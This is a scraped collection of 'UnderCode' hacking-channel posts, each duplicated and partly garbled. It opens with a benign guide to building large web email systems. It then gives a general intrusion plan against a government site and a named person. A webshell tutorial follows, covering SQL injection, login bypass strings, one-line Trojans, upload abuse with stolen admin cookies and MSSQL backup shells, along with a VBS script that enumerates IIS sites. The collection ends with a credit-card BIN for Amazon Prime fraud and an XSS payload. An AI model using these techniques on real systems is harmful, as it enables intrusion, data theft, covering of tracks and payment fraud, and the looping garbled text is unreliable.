UNDERCODE COMMUNITY
π¦UNLIMITED HACKING-PROGRAMMING TIPS ARE POSTED HERE. BUT STILL WONDERING WHAT MOST LANGUAGE PROGRAMMING DESIGNED FOR HACKING SPECIALLY ?
84% right, python is most usuable by hackers because its easy, but without C no python, python is made by Cπ€π
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Set up a large-capacity Web-based Email system full tutorial by UnderCode :
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
> An Email system can be divided into server-side and client-side. The Email system of the Web interface puts the Email client on the Web server-side, so what the Email system needs to implement is an Email client of the Web interface. However, because this Email system requires a large number of users, there are specific requirements for the Email server.
γγβ operating system and user databases
1) by providing high-capacity Email System requirements for the operating system and the database is very high, therefore, select the appropriate operating system and the database is the most basic question.
2) Because of the high stability and performance required to provide web and email services, unix is ββgenerally used as the server operating system. For example, hotmail uses freebsd and solaris, and domestic sites such as 163 also use the bsd series.
3) However, Unix's standard email system is also unsuitable for such large capacity services. Some Unix systems, such as the current version of Linux, have only 16-bit user IDs, so the number of users can only be up to 64k, even if the Unix system itself supports 32-bit user IDs. Considering performance factors, the number of users supported by a single server Do not exceed 100,000. In order to support scalability for more users, multiple servers are generally used to provide services at the same time. Although standard Unix users can still be used as email users at this time, non-Unix systems are generally used in consideration of security, performance, and manageability.
4) Users come as email users. The storage of user data is usually in the form of a database that supports network access. Commonly used are ldap, standard databases, and user databases implemented by the email system itself. Among them, ldap is the standard for providing directory services, so it should be the best choice. Its commonly used open source implementation is openldap; while the standard database is easy to implement and highly scalable, and the most commonly used on the Internet is mysql. ; In addition, there are other ways to achieve.
γγ
β save messages
1) for bulk Email system, the most critical technical issue is how to handle mail storage, the manner in which to improve storage efficiency, we will determine the success of Email system or not.
2) Due to the large number of users, how to save users' emails is a very important issue. Traditional Unix uses a single directory to store mail for all users, which greatly reduces the performance of the file system when there are a large number of users.
3) Only by using multi-level directories and a limited number of files in each directory, can we reduce the system consumption when opening files, or no longer use simple files to save emails, but use a certain form of packaging. The database is completely used to save emails. Because users' email operations are mostly file operations, and the size changes greatly, it will cause a large waste of performance and storage space.
4) Due to the huge number of users and the need to be accessed by multiple servers at the same time, a server or server cluster with a large storage space must be used for storage. The storage space is shared through Fibre Channel or the network file system NFS, so that each user's mail storage The path is consistent for each server. Fibre Channel is a very expensive solution. It is more common to use NFS. You can use a dedicated NFS server, such as NetApp, or a PC Unix server with RAID capabilities.
π¦ Set up a large-capacity Web-based Email system full tutorial by UnderCode :
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
> An Email system can be divided into server-side and client-side. The Email system of the Web interface puts the Email client on the Web server-side, so what the Email system needs to implement is an Email client of the Web interface. However, because this Email system requires a large number of users, there are specific requirements for the Email server.
γγβ operating system and user databases
1) by providing high-capacity Email System requirements for the operating system and the database is very high, therefore, select the appropriate operating system and the database is the most basic question.
2) Because of the high stability and performance required to provide web and email services, unix is ββgenerally used as the server operating system. For example, hotmail uses freebsd and solaris, and domestic sites such as 163 also use the bsd series.
3) However, Unix's standard email system is also unsuitable for such large capacity services. Some Unix systems, such as the current version of Linux, have only 16-bit user IDs, so the number of users can only be up to 64k, even if the Unix system itself supports 32-bit user IDs. Considering performance factors, the number of users supported by a single server Do not exceed 100,000. In order to support scalability for more users, multiple servers are generally used to provide services at the same time. Although standard Unix users can still be used as email users at this time, non-Unix systems are generally used in consideration of security, performance, and manageability.
4) Users come as email users. The storage of user data is usually in the form of a database that supports network access. Commonly used are ldap, standard databases, and user databases implemented by the email system itself. Among them, ldap is the standard for providing directory services, so it should be the best choice. Its commonly used open source implementation is openldap; while the standard database is easy to implement and highly scalable, and the most commonly used on the Internet is mysql. ; In addition, there are other ways to achieve.
γγ
β save messages
1) for bulk Email system, the most critical technical issue is how to handle mail storage, the manner in which to improve storage efficiency, we will determine the success of Email system or not.
2) Due to the large number of users, how to save users' emails is a very important issue. Traditional Unix uses a single directory to store mail for all users, which greatly reduces the performance of the file system when there are a large number of users.
3) Only by using multi-level directories and a limited number of files in each directory, can we reduce the system consumption when opening files, or no longer use simple files to save emails, but use a certain form of packaging. The database is completely used to save emails. Because users' email operations are mostly file operations, and the size changes greatly, it will cause a large waste of performance and storage space.
4) Due to the huge number of users and the need to be accessed by multiple servers at the same time, a server or server cluster with a large storage space must be used for storage. The storage space is shared through Fibre Channel or the network file system NFS, so that each user's mail storage The path is consistent for each server. Fibre Channel is a very expensive solution. It is more common to use NFS. You can use a dedicated NFS server, such as NetApp, or a PC Unix server with RAID capabilities.
Pinterest
UndercOde (UNDERCODEOFFICIAL) on Pinterest
UndercOde | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
5) When using NFS shared storage space, you must pay attention to a very important issue: Because NFS lacks a file locking mechanism, when using the traditional user mail storage format mailbox, all mails are stored in the same file, so mail is sent. The operation must be locked to ensure that there are no access conflicts, which makes it unsuitable for NFS storage. In order to solve this problem, qmail proposes the Maildir storage method. Each mail is stored as a separate file in the user's personal mail directory, which avoids locking. Therefore, common free mail servers generally use the Maildir method to store user mail.
6) If you do not plan to use a shared file system to store user mail, and you want to allow each server to access only user mail on its own hard disk storage space, then both the Email server and the client need to be customized so that they can pass the user name Come to find the real server to which the user belongs, and hand over the access task to this server to complete. The disadvantages of this method are that in addition to the large changes required and the complex system structure, the server is divided by users, which is not conducive to load sharing.
6) If you do not plan to use a shared file system to store user mail, and you want to allow each server to access only user mail on its own hard disk storage space, then both the Email server and the client need to be customized so that they can pass the user name Come to find the real server to which the user belongs, and hand over the access task to this server to complete. The disadvantages of this method are that in addition to the large changes required and the complex system structure, the server is divided by users, which is not conducive to load sharing.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 2- Set up a large-capacity Web-based Email system full tutorial by UnderCode :
pinterest.com/UnderCodeOfficial
β Web client
1) what kind of script to use Web Email client program is not standard, but if the use of open source will save a lot of trouble.
2) Web Interface Another important part of the Email system is the Web client. This part will function like OutLook in a personal computer and is responsible for providing users with the ability to access their own mail. Because Web access itself is connectionless, user security must be guaranteed. Basically, security can be guaranteed by the session ID, temporary directory established after login, and verification in the program.
3) The Web client must access the server in a unified way. It can obtain the user's mail through direct file access, or through standard protocols such as POP3 and IMAP. For a system that uses a network file system to share user mail, the direct file access method is the most direct and convenient, and does not require additional consumption. The direct benefit of accessing the server through the POP3 and IMAP protocols is that the Web client is separated from the Email server, which improves system security.
β load balancing
1) Load balancing system will be a long-term problem, which determines the scalability of the system.
2) Because it needs to provide access to a large number of users, a single server cannot meet this need, and a multi-server approach must be used.
3) In addition to partitioning according to functionality, such as the separation of Web server, Email server, and file server, it is also necessary to use multiple servers for load balancing for some resource-constrained services. Although some current commercial manufacturers have also proposed some server cluster solutions, the common simple and effective methods are DNS cycle analysis, Web server relocation, and NAT load balancing.
4) DNS round-robin resolution is to assign multiple IP addresses to the same name. It is used on quite large sites such as Yahoo and the actual results are quite good. Web server relocation is a process in which the web server randomly generates real page URLs on different servers, so that different browsers load pages on different servers. Using it can only achieve load balancing for web clients. And NAT load balancing uses the fourth layer switch to make the same request to different servers. In addition to expensive switches, there are some software that can complete the NAT function. I have changed the FreeBSD natd to support load balancing, which is also an option for users who have to reduce performance requirements due to switch price issues.
γγβ case study
1) there are many domestic Web Email system, Netease, 21CN and Sina Email is one of the representatives.
2) Currently, the most popular Web interface Email system in rusia/leb is NetEase's system. It is a system that uses qmail as the basic server software and then changes it. It uses the NFS network file system as the user's mail storage space, uses Maildir as the mail storage format, and provides multi-level directories to support a large number of users. The Web client is implemented for them, and provides services to users by directly accessing users' emails.
Written by UnderCode
γβ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 2- Set up a large-capacity Web-based Email system full tutorial by UnderCode :
pinterest.com/UnderCodeOfficial
β Web client
1) what kind of script to use Web Email client program is not standard, but if the use of open source will save a lot of trouble.
2) Web Interface Another important part of the Email system is the Web client. This part will function like OutLook in a personal computer and is responsible for providing users with the ability to access their own mail. Because Web access itself is connectionless, user security must be guaranteed. Basically, security can be guaranteed by the session ID, temporary directory established after login, and verification in the program.
3) The Web client must access the server in a unified way. It can obtain the user's mail through direct file access, or through standard protocols such as POP3 and IMAP. For a system that uses a network file system to share user mail, the direct file access method is the most direct and convenient, and does not require additional consumption. The direct benefit of accessing the server through the POP3 and IMAP protocols is that the Web client is separated from the Email server, which improves system security.
β load balancing
1) Load balancing system will be a long-term problem, which determines the scalability of the system.
2) Because it needs to provide access to a large number of users, a single server cannot meet this need, and a multi-server approach must be used.
3) In addition to partitioning according to functionality, such as the separation of Web server, Email server, and file server, it is also necessary to use multiple servers for load balancing for some resource-constrained services. Although some current commercial manufacturers have also proposed some server cluster solutions, the common simple and effective methods are DNS cycle analysis, Web server relocation, and NAT load balancing.
4) DNS round-robin resolution is to assign multiple IP addresses to the same name. It is used on quite large sites such as Yahoo and the actual results are quite good. Web server relocation is a process in which the web server randomly generates real page URLs on different servers, so that different browsers load pages on different servers. Using it can only achieve load balancing for web clients. And NAT load balancing uses the fourth layer switch to make the same request to different servers. In addition to expensive switches, there are some software that can complete the NAT function. I have changed the FreeBSD natd to support load balancing, which is also an option for users who have to reduce performance requirements due to switch price issues.
γγβ case study
1) there are many domestic Web Email system, Netease, 21CN and Sina Email is one of the representatives.
2) Currently, the most popular Web interface Email system in rusia/leb is NetEase's system. It is a system that uses qmail as the basic server software and then changes it. It uses the NFS network file system as the user's mail storage space, uses Maildir as the mail storage format, and provides multi-level directories to support a large number of users. The Web client is implemented for them, and provides services to users by directly accessing users' emails.
Written by UnderCode
γβ β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UndercOde (UNDERCODEOFFICIAL) on Pinterest
UndercOde | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Full Hacking Process by UnderCode :
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
First determine the purpose of the invasion: To obtain information about the Bruce computer
1) Collect information
again, according to the more information searched again, and then search again ... to see if there
is the other party's mailbox, facebook, twitter, home address, public information on salary, etc. in
this information, this is Social engineering.
2) Analysis: Knowing the collected information
3) Determine the target of the invasion. Invade a government website.
4) Prepare stable broilers. Use them as a springboard.
5) Perform an initial security check on the website, check the IP address, scan the development
port (different ports correspond to different services), see the number of domain names bound
to this server, see if other websites on the server can invade, and check the websites on all servers
( (Side note), to see if there are common vulnerabilities in the website (upload, injection, database
thrashing, cross-domain xml, fake cookies, weak passwords, default file addresses, including
vulnerabilities, etc.), go through Detection of these columns, that site is very safe on the server.
6) In this regard the invasion server with IP end room. Finally found the same room server has
a low level of security vulnerabilities, squat one week finally got shell of this site, enter Insufficient
server privileges, elevation of privileges .... finally obtained server privileges.
7) Sniffing from the same computer room , this server ... After 1 month of sniffing.I found the
background password of a website ... enter privileges and get server permissions.
8) Make a web Trojan ... upload a website .... Waiting for Bruce to hook up.
8. Squat guard ,"undercode after waiting for a month, I found that the broiler increased by more than 100 ...
Among them, there is a Bruce host.
9) Copy content ...
10) Wipe the butt ... .. completely delete all traces ...
.... probably similar process
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Full Hacking Process by UnderCode :
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
First determine the purpose of the invasion: To obtain information about the Bruce computer
1) Collect information
again, according to the more information searched again, and then search again ... to see if there
is the other party's mailbox, facebook, twitter, home address, public information on salary, etc. in
this information, this is Social engineering.
2) Analysis: Knowing the collected information
3) Determine the target of the invasion. Invade a government website.
4) Prepare stable broilers. Use them as a springboard.
5) Perform an initial security check on the website, check the IP address, scan the development
port (different ports correspond to different services), see the number of domain names bound
to this server, see if other websites on the server can invade, and check the websites on all servers
( (Side note), to see if there are common vulnerabilities in the website (upload, injection, database
thrashing, cross-domain xml, fake cookies, weak passwords, default file addresses, including
vulnerabilities, etc.), go through Detection of these columns, that site is very safe on the server.
6) In this regard the invasion server with IP end room. Finally found the same room server has
a low level of security vulnerabilities, squat one week finally got shell of this site, enter Insufficient
server privileges, elevation of privileges .... finally obtained server privileges.
7) Sniffing from the same computer room , this server ... After 1 month of sniffing.I found the
background password of a website ... enter privileges and get server permissions.
8) Make a web Trojan ... upload a website .... Waiting for Bruce to hook up.
8. Squat guard ,"undercode after waiting for a month, I found that the broiler increased by more than 100 ...
Among them, there is a Bruce host.
9) Copy content ...
10) Wipe the butt ... .. completely delete all traces ...
.... probably similar process
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ WebShell Full tutorial by UnderCode :
instagram.com/UnderCodetestingCompany
π¦ ππΌππ πππΈβπ :
1) First of all, we need to determine the website we want to detect. It can be a certain website that we have set, or we can search it through Google
2) The best success rate for dynamic website invasion such as ASP. Without going into detail, this step is to select the target site. Then we started testing the website. Take a closer look at the end of this website's hyperlink if there is a character like "ID = XXX (XXX stands for number)"; if so, we can perform the following basic test on it: open this link, and enter the ID in the address bar = XXX followed by "and 1 = 2" (do not add quotes), click submit to open a new page, if this page is displayed abnormally, or if something is wrong, it means there is an injection vulnerability!
3) We You can try to inject it! Here we pay attention, there are generally 2 types of databases: ACCESS, MSSQL 2 databases. Let's talk about the solution of the ACCESS database first. Here we can use the tool to guess the contents of the database (you can also guess manually, but it is too tedious), here we use the "SQL injection guess" in the Ming Xiaozi tool. Fill in the injection points that we just manually detected. After clicking the detection, the program starts to detect whether there are injection points.
4) At the beginning, we have already detected them manually, so they definitely exist. Then you can click "guess the table name" to guess the table name of the database. With the program, we will perform these operations very easily; we will guess all the table names soon, and then select the table name we want to guess.
5) To solve the table name, use the program to guess the column name of the table name, and then you can guess the record content. Websites with improper general precautions will be guessed the username and password; then we use the program's built-in function to guess the background address, after guessing, log in with the obtained username and password; websites with poor general precautions can even directly Login with universal username and password 'or' = 'or'. After landing successfully, we enter the background, which is the basic condition for all invasions. Officially started our invasion. First look at the database backup function. If so, let's see how to get the Webshell.
6) In one sentence, the Trojan. Through various methods, write this sentence into the database, and then turn the database written into this sentence into a suffix by backing up. Asp files, of course, you must pay attention to the file address after backup, and then access it. If the display is garbled, then congratulations, basically successful! If you use a one-line Trojan client to connect locally, just The URL of the page with garbled characters is connected.
7) After the connection is successful, you can see the familiar WebShell! 2. Use the picture upload function. We change the suffix of the ASP Trojan to the suffix of the picture, such as GIF, JPG, BMP, etc., and upload it. After the upload is successful, it will prompt the file to be uploaded successfully, and will give the file location, such as' UploadFiles / 20080501012. gif '; However, some may not prompt, we will use WSockExpert to capture the upload process and capture the upload path; then, we use the database backup function to change the format of gif and other pictures into ASP Format database for access. At this time, we can usually see our WebShell! However, some current website upload functions will detect this.
π¦ WebShell Full tutorial by UnderCode :
instagram.com/UnderCodetestingCompany
π¦ ππΌππ πππΈβπ :
1) First of all, we need to determine the website we want to detect. It can be a certain website that we have set, or we can search it through Google
2) The best success rate for dynamic website invasion such as ASP. Without going into detail, this step is to select the target site. Then we started testing the website. Take a closer look at the end of this website's hyperlink if there is a character like "ID = XXX (XXX stands for number)"; if so, we can perform the following basic test on it: open this link, and enter the ID in the address bar = XXX followed by "and 1 = 2" (do not add quotes), click submit to open a new page, if this page is displayed abnormally, or if something is wrong, it means there is an injection vulnerability!
3) We You can try to inject it! Here we pay attention, there are generally 2 types of databases: ACCESS, MSSQL 2 databases. Let's talk about the solution of the ACCESS database first. Here we can use the tool to guess the contents of the database (you can also guess manually, but it is too tedious), here we use the "SQL injection guess" in the Ming Xiaozi tool. Fill in the injection points that we just manually detected. After clicking the detection, the program starts to detect whether there are injection points.
4) At the beginning, we have already detected them manually, so they definitely exist. Then you can click "guess the table name" to guess the table name of the database. With the program, we will perform these operations very easily; we will guess all the table names soon, and then select the table name we want to guess.
5) To solve the table name, use the program to guess the column name of the table name, and then you can guess the record content. Websites with improper general precautions will be guessed the username and password; then we use the program's built-in function to guess the background address, after guessing, log in with the obtained username and password; websites with poor general precautions can even directly Login with universal username and password 'or' = 'or'. After landing successfully, we enter the background, which is the basic condition for all invasions. Officially started our invasion. First look at the database backup function. If so, let's see how to get the Webshell.
6) In one sentence, the Trojan. Through various methods, write this sentence into the database, and then turn the database written into this sentence into a suffix by backing up. Asp files, of course, you must pay attention to the file address after backup, and then access it. If the display is garbled, then congratulations, basically successful! If you use a one-line Trojan client to connect locally, just The URL of the page with garbled characters is connected.
7) After the connection is successful, you can see the familiar WebShell! 2. Use the picture upload function. We change the suffix of the ASP Trojan to the suffix of the picture, such as GIF, JPG, BMP, etc., and upload it. After the upload is successful, it will prompt the file to be uploaded successfully, and will give the file location, such as' UploadFiles / 20080501012. gif '; However, some may not prompt, we will use WSockExpert to capture the upload process and capture the upload path; then, we use the database backup function to change the format of gif and other pictures into ASP Format database for access. At this time, we can usually see our WebShell! However, some current website upload functions will detect this.
8) If the backup file cannot be found to belong to the database, it will prompt "Illegal database" "What should we do at this time? Since we want to detect whether there are database features, then we can't add pictures to the database features? Right! That's the truth, we can add database features to pictures through the DOS COPY command. The command is "COPY Trojan picture.gif database file.mdb synthesized file.gif" This way, our synthesized picture It will have the characteristics of the database! However, some websites do not find a place where there is a database backup.
π¦ The above method will not work. What should we do at this time? Don't worry, things are always resolved Way. Find a page with an upload function, upload anything, use WSockExpert to capture the upload process. Generally, after we click upload, we will find the uploaded ASP page and the corresponding cookies in the package captured by WSockExpert, of course. We must first enter the background here and upload it with the administrator's account.
10) The obtained cookies are the administrator's, which can be used later. We then use the upload function of Mingzi, select the uploaded page, that is, the page we captured, fill in the obtained cookies, and select the Trojan we want to upload (to avoid killing! Otherwise delete it to the server), click upload, when the program prompts success, we can access our WebShell! If it fails, try another upload type.
11) Sometimes we may not be able to get the WebShell of a website at all. At this time, we can use a marginal method to take a WebShell for a website that belongs to the same server, and then escalate to the entire server.
12) The target website can be hacked. The above is the analysis of the ACCESS database and obtaining the webshell. Below, I analyze the MSSQL database. In the past, I also learned the solution of the ACCESS database.
13) When I learned the MSSQL database, I found that I still did not understand a lot, so I took a lot of detours. Now I will summarize the method of using the webshell of the MSSQL database. Friends who contacted webshell were helpful. First, we first check the user permissions of the MSSQL database. Generally, there are two types. One is the SA (system admin) permission. This permission is very large. The other is the DB_OWNER permission.
14) This permission is assigned to the user. Modify, delete, and add data tables to the database and execute most of the stored procedure permissions. However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions. We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website.
15) My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next If it fails, try another upload type. Sometimes we may not be able to get the WebShell of a website at all. At this time, we can use a marginal method to take a WebShell for a website that belongs to the same server, and then escalate the rights to the entire server. The target website can be hacked. The above is the analysis of the ACCESS database and obtaining the webshell. Below, I analyze the MSSQL database.
16) In the past, I also learned the solution of the ACCESS database. When I learned the MSSQL database, I found that I still do nβt understand a lot, so I took a lot of detours. Now I summarize the method of the MSSQL database using the webshell. Friends who contacted webshell were helpful.
17) First, we first check the user permissions of the MSSQL database. Generally, there are two types. One is the SA (system admin) permission. This permission is very large. The other is the DB_OWNER permission. This permission is assigned to the user. Modify, delete, and add data tables to the database and execute most of the stored procedure permissions.
π¦ The above method will not work. What should we do at this time? Don't worry, things are always resolved Way. Find a page with an upload function, upload anything, use WSockExpert to capture the upload process. Generally, after we click upload, we will find the uploaded ASP page and the corresponding cookies in the package captured by WSockExpert, of course. We must first enter the background here and upload it with the administrator's account.
10) The obtained cookies are the administrator's, which can be used later. We then use the upload function of Mingzi, select the uploaded page, that is, the page we captured, fill in the obtained cookies, and select the Trojan we want to upload (to avoid killing! Otherwise delete it to the server), click upload, when the program prompts success, we can access our WebShell! If it fails, try another upload type.
11) Sometimes we may not be able to get the WebShell of a website at all. At this time, we can use a marginal method to take a WebShell for a website that belongs to the same server, and then escalate to the entire server.
12) The target website can be hacked. The above is the analysis of the ACCESS database and obtaining the webshell. Below, I analyze the MSSQL database. In the past, I also learned the solution of the ACCESS database.
13) When I learned the MSSQL database, I found that I still did not understand a lot, so I took a lot of detours. Now I will summarize the method of using the webshell of the MSSQL database. Friends who contacted webshell were helpful. First, we first check the user permissions of the MSSQL database. Generally, there are two types. One is the SA (system admin) permission. This permission is very large. The other is the DB_OWNER permission.
14) This permission is assigned to the user. Modify, delete, and add data tables to the database and execute most of the stored procedure permissions. However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions. We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website.
15) My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next If it fails, try another upload type. Sometimes we may not be able to get the WebShell of a website at all. At this time, we can use a marginal method to take a WebShell for a website that belongs to the same server, and then escalate the rights to the entire server. The target website can be hacked. The above is the analysis of the ACCESS database and obtaining the webshell. Below, I analyze the MSSQL database.
16) In the past, I also learned the solution of the ACCESS database. When I learned the MSSQL database, I found that I still do nβt understand a lot, so I took a lot of detours. Now I summarize the method of the MSSQL database using the webshell. Friends who contacted webshell were helpful.
17) First, we first check the user permissions of the MSSQL database. Generally, there are two types. One is the SA (system admin) permission. This permission is very large. The other is the DB_OWNER permission. This permission is assigned to the user. Modify, delete, and add data tables to the database and execute most of the stored procedure permissions.
18) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions. We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations.
19) But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next If it fails, try another upload type. Sometimes we may not be able to get the WebShell of a website at all. At this time, we can use a marginal method to take a WebShell for a website that belongs to the same server, and then escalate the rights to the entire server.
20) The target website can be hacked. The above is the analysis of the ACCESS database and obtaining the webshell. Below, I analyze the MSSQL database. In the past, I also learned the solution of the ACCESS database. When I learned the MSSQL database, I found that I still do nβt understand a lot, so I took a lot of detours.
21) Now I summarize the method of the MSSQL database using the webshell. Friends who contacted webshell were helpful. First, we first check the user permissions of the MSSQL database. Generally, there are two types.
22) One is the SA (system admin) permission. This permission is very large. The other is the DB_OWNER permission. This permission is assigned to the user. Modify, delete, and add data tables to the database and execute most of the stored procedure permissions.
23) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions.
24) We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next The other is the DB_OWNER permission, which grants the user permission to modify, delete, and add new data tables to the database, and execute most stored procedures. However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions.
25) We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next The other is the DB_OWNER permission, which grants the user permission to modify, delete, and add new data tables to the database, and execute most stored procedures.
26) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions. We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations.
19) But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next If it fails, try another upload type. Sometimes we may not be able to get the WebShell of a website at all. At this time, we can use a marginal method to take a WebShell for a website that belongs to the same server, and then escalate the rights to the entire server.
20) The target website can be hacked. The above is the analysis of the ACCESS database and obtaining the webshell. Below, I analyze the MSSQL database. In the past, I also learned the solution of the ACCESS database. When I learned the MSSQL database, I found that I still do nβt understand a lot, so I took a lot of detours.
21) Now I summarize the method of the MSSQL database using the webshell. Friends who contacted webshell were helpful. First, we first check the user permissions of the MSSQL database. Generally, there are two types.
22) One is the SA (system admin) permission. This permission is very large. The other is the DB_OWNER permission. This permission is assigned to the user. Modify, delete, and add data tables to the database and execute most of the stored procedure permissions.
23) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions.
24) We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next The other is the DB_OWNER permission, which grants the user permission to modify, delete, and add new data tables to the database, and execute most stored procedures. However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions.
25) We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next The other is the DB_OWNER permission, which grants the user permission to modify, delete, and add new data tables to the database, and execute most stored procedures.
26) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions. We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations.
27) But what to do sometimes? We just upload a vbs file, and save the following file as lookweb.vbs: On Error Resume Next
If (LCase (Right (WScript.Fullname, 11)) = "wscript.exe") Then
Msgbox Space (12) & "IIS Virtual Web Viewer" & Space (12) & Chr (13) & Space (9) & " Usage: Cscript vWeb.vbs ", 4096," Lilo "
WScript.Quit
End If
Set ObjService = GetObject (" IIS: // LocalHost / W3SVC ")
For Each obj3w In objservice
If IsNumeric (obj3w.Name) Then
Set OService = GetObject ("IIS: // LocalHost / W3SVC /" & obj3w.Name)
Set VDirObj = OService.GetObject ("IIsWebVirtualDir", "ROOT")
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr (10) & "[" & OService.ServerComment & "]"
For Each Binds In OService.ServerBindings
Web = "{" & Replace (Binds, ":", "} {") & "}"
WScript.Echo Replace (Split (Replace (Web, "", ""), "} {") (2), "}", "")
Next
WScript.Echo "Path:" & VDirObj.Path
End If
Next
γγ
28) and then use NBSI to upload to the server, and then execute cscript X: \ lookweb.vbs, we can see this in the echo message The corresponding website on the server and its corresponding website directory are very convenient. Website directory at a glance. After finding the directory of the website, we can use the differential backup to obtain the webshell.
> where a is the password we want to connect to the Trojan.
29) We must pay attention to what type the MSSQL database is. The type is still digital. Fill in the corresponding place, the path is usually the directory of the website, such as "D: \ wwwroot \" write the database name after the backup, such as ri.asp; click "BackupShell" system to automatically back up the database. After the backup is successful, we will access the file we backed up, and it will be successful when the browser is garbled. We can use the one sentence link of lake2, please pay attention to the password. You can basically get the webshell here; It is also possible to directly find the website directory without uploading the difference, and upload the webshell file directly to the website directory.
30) The above are all written by undercode long-term practice and experience. It is completely original, whirring and exhausting me.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
If (LCase (Right (WScript.Fullname, 11)) = "wscript.exe") Then
Msgbox Space (12) & "IIS Virtual Web Viewer" & Space (12) & Chr (13) & Space (9) & " Usage: Cscript vWeb.vbs ", 4096," Lilo "
WScript.Quit
End If
Set ObjService = GetObject (" IIS: // LocalHost / W3SVC ")
For Each obj3w In objservice
If IsNumeric (obj3w.Name) Then
Set OService = GetObject ("IIS: // LocalHost / W3SVC /" & obj3w.Name)
Set VDirObj = OService.GetObject ("IIsWebVirtualDir", "ROOT")
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr (10) & "[" & OService.ServerComment & "]"
For Each Binds In OService.ServerBindings
Web = "{" & Replace (Binds, ":", "} {") & "}"
WScript.Echo Replace (Split (Replace (Web, "", ""), "} {") (2), "}", "")
Next
WScript.Echo "Path:" & VDirObj.Path
End If
Next
γγ
28) and then use NBSI to upload to the server, and then execute cscript X: \ lookweb.vbs, we can see this in the echo message The corresponding website on the server and its corresponding website directory are very convenient. Website directory at a glance. After finding the directory of the website, we can use the differential backup to obtain the webshell.
> where a is the password we want to connect to the Trojan.
29) We must pay attention to what type the MSSQL database is. The type is still digital. Fill in the corresponding place, the path is usually the directory of the website, such as "D: \ wwwroot \" write the database name after the backup, such as ri.asp; click "BackupShell" system to automatically back up the database. After the backup is successful, we will access the file we backed up, and it will be successful when the browser is garbled. We can use the one sentence link of lake2, please pay attention to the password. You can basically get the webshell here; It is also possible to directly find the website directory without uploading the difference, and upload the webshell file directly to the website directory.
30) The above are all written by undercode long-term practice and experience. It is completely original, whirring and exhausting me.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AFTER THIS TUTORIAL YOU ARE ABLE TO HACK ANY VIA WEBSHELL
π¦ Tested Bin Amazon Prime Video- Underc0de
548583xxxxxxxxxx
IP: Spain / Spain
Vpn: VyprVPN or the like
Mail: Gmail, Outlook, etc.
Address Line 1: Calle Reyes Catolicos
Population: Barcelona
State / Province / Region: Barcelona
Postal code: 11011
Country Spain
Telephone number: 300xxxxxxx (replace x with numbers)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
548583xxxxxxxxxx
IP: Spain / Spain
Vpn: VyprVPN or the like
Mail: Gmail, Outlook, etc.
Address Line 1: Calle Reyes Catolicos
Population: Barcelona
State / Province / Region: Barcelona
Postal code: 11011
Country Spain
Telephone number: 300xxxxxxx (replace x with numbers)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Terminal skills-:
twitter.com/undercodetc
1) Command: win + R win + D ctrl + P
2) Find βaboutβ information and call IE. File, Open, C: \ WINDOWS \ system32 \ cmd.exe
3)XSS pop-up window calls IE. Such as <script> window.open (/ s /) </ script>
4) Text page, ctrl + P, printer.
